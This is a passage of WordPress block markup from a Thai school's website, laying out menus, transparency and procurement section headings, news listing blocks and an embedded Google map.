-->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline 